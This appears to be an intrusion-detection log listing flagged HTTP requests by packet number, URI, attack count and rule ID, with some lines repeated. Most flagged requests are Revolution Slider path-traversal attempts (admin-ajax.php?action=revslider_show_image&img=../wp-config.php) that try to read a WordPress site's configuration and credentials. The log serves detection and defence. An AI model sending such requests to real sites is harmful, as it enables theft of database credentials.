Packet [1543]	Uri [/sites/bib3.us.es/files/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	 Nattacks [2]	[s2b-1113-5]	[s2b-1113-5]
Packet [1544]	Uri [/sites/bib3.us.es/files/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php]	 Nattacks [2]	[s2b-1113-5]	[s2b-1113-5]
Packet [1545]	Uri [/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	 Nattacks [1]	[s2b-1113-5]
Packet [1546]	Uri [/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php]	 Nattacks [1]	[s2b-1113-5]
Packet [7734]	Uri [/busca_y_encuentra/cat%20]	 Nattacks [1]	[s2b-1147-7]
Packet [1545]	Uri [/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	 Nattacks [1]	[s2b-1113-5]
Packet [1546]	Uri [/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php]	 Nattacks [1]	[s2b-1113-5]
Packet [1543]	Uri [/sites/bib3.us.es/files/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php]	 Nattacks [2]	[s2b-1113-5]	[s2b-1113-5]
Packet [1544]	Uri [/sites/bib3.us.es/files/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php]	 Nattacks [2]	[s2b-1113-5]	[s2b-1113-5]
Packet [9369]	Uri [/admin.php]	 Nattacks [1]	[s2b-1301-11]
